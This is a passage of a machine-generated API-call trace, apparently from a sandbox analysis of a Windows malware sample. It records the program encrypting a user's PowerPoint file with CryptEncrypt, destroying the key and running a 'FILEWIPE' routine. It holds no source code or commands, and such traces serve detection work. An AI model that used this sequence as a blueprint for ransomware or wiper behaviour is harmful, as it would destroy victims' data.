wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.685] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0032.685] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.685] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.686] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x127e9, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x127f0) returned 1 [0032.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.686] CharLowerBuffW (in: lpsz="byte[75761]", cchLength=0xb | out: lpsz="byte[75761]") returned 0xb [0032.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.688] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.688] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.688] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.689] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.689] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8a27a8*, pdwDataLen=0x6ae220*=0x127e9, dwBufLen=0x127f0 | out: pbData=0x8a27a8*, pdwDataLen=0x6ae220*=0x127f0) returned 1 [0032.690] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.690] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.690] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.690] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.691] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.691] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.692] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.692] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0032.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.692] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.692] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.692] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.692] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0032.692] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.692] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.692] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.692] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.692] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.692] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0032.692] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.697] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.697] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.697] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.701] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.701] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.701] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0032.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.701] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.701] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.702] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0032.702] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.702] CryptDestroyKey (hKey=0x7c2200) returned 1 [0032.702] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.702] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.702] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0032.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.702] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.702] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.702] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0032.702] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0032.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0032.702] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.702] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.702] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0032.703] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0032.703] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0032.703] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.703] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.703] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.703] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0032.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.703] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.703] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.703] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.703] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.703] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.703] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0032.703] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0032.703] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.703] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0032.703] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.703] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0032.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0032.704] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.704] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.704] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0032.704] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.704] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.704] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.704] FreeLibrary (hLibModule=0x754b0000) returned 1 [0032.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0032.704] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0032.704] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.705] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.705] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.705] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.706] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.706] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0032.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0032.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.706] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.706] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.706] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec42880, ftCreationTime.dwHighDateTime=0x1d58018, ftLastAccessTime.dwLowDateTime=0xf13a8410, ftLastAccessTime.dwHighDateTime=0x1d5738b, ftLastWriteTime.dwLowDateTime=0xf13a8410, ftLastWriteTime.dwHighDateTime=0x1d5738b, nFileSizeHigh=0x0, nFileSizeLow=0x127e9, dwReserved0=0x0, dwReserved1=0x777648, cFileName="5Rjt0hcE.pptx", cAlternateFileName="5RJT0H~1.PPT")) returned 0x7c2100 [0032.706] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.707] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.707] CharLowerBuffW (in: lpsz="byte[75753]", cchLength=0xb | out: lpsz="byte[75753]") returned 0xb [0032.707] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.707] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.707] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.707] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0032.707] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0032.707] FreeLibrary (hLibModule=0x76b40000) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0032.707] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.708] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 